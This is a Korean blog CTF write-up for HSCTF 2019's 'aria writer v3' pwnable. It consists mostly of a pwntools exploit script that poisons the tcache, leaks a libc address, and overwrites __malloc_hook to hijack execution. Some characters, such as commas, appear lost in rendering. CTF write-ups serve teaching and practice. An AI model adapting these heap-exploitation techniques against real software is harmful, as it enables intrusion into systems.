SDJ( 수돈재 아님 ㅎ )

HSCTF 2019 - aria writer v3 본문

write-up/pwnable

HSCTF 2019 - aria writer v3

ShinDongJun 2019. 10. 8. 19:25

64bit에 Full RELRO, Canary, NX 활성화 되어있다.

주어진 libc가 2.27이고 tcache문제기 때문에 ubuntu 18.04로 풀었다.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
 
= process('./aria-writer-v3')
 
def choice(idx):
    p.sendlineafter("> "str(idx))
 
def alloc(size, content):
    choice(1)
    p.sendlineafter("> "str(size))
    p.sendafter("> ", content)
 
def free():
    choice(2)
 
win = 0x00000000004008A7
name = 0x0000000000602040
aim = 0x602038
 
one = [0x4f2c50x4f3220x10a38c]
 
pay = 'a'*8 + '\x00'*(4*42)+p32(0xf0000000)
p.sendlineafter("> ", pay)
 
alloc(0x80'a'*0x10)
free()
free()
 
alloc(0x80, p64(aim+0x500))
alloc(0x80'a'*0x10)
alloc(0x80, p64(0)*2+p64(0x21)+p64(0)*3+p64(0x21))
 
alloc(0x90'b'*0x10)
free()
free()
 
alloc(0x90, p64(aim))
alloc(0x90'b'*0x10)
alloc(0x90, p64(0x511)+p64(aim+0x8))
 
free()    # leak
 
p.recvuntil('\n')
main_arena_96 = u64(p.recv(6).ljust(8,'\x00'))
malloc_hook = main_arena_96 - 96 - 0x10
libc_base = malloc_hook - 4111408
one_gadget = libc_base + one[1]
 
print "main_arena_96 : " + hex(main_arena_96)
print "malloc_hook : " + hex(malloc_hook)
print "libc_base : " + hex(libc_base)
print "one_gadget : " + hex(one_gadget)
 
alloc(0x40'\x00'*8)
alloc(0x40'\x00'*8)
free()
free()
 
alloc(0x40, p64(malloc_hook))
alloc(0x40'c'*0x10)
alloc(0x40, p64(win)*2)
 
choice(1)
p.sendlineafter("> "str(1))
 
p.interactive()
 

 

'write-up > pwnable' 카테고리의 다른 글

BackdoorCTF 2019 - babytcache  (0) 2019.11.12
facebook ctf 2019 - otp-server  (0) 2019.11.04
HSCTF 2019 - Aria writer  (0) 2019.10.08
PwnThybytes 2019 - babyfactory  (0) 2019.10.07
NACTF 2019 - Loopy #1  (0) 2019.09.23
'write-up/pwnable' Related Articles more
Comments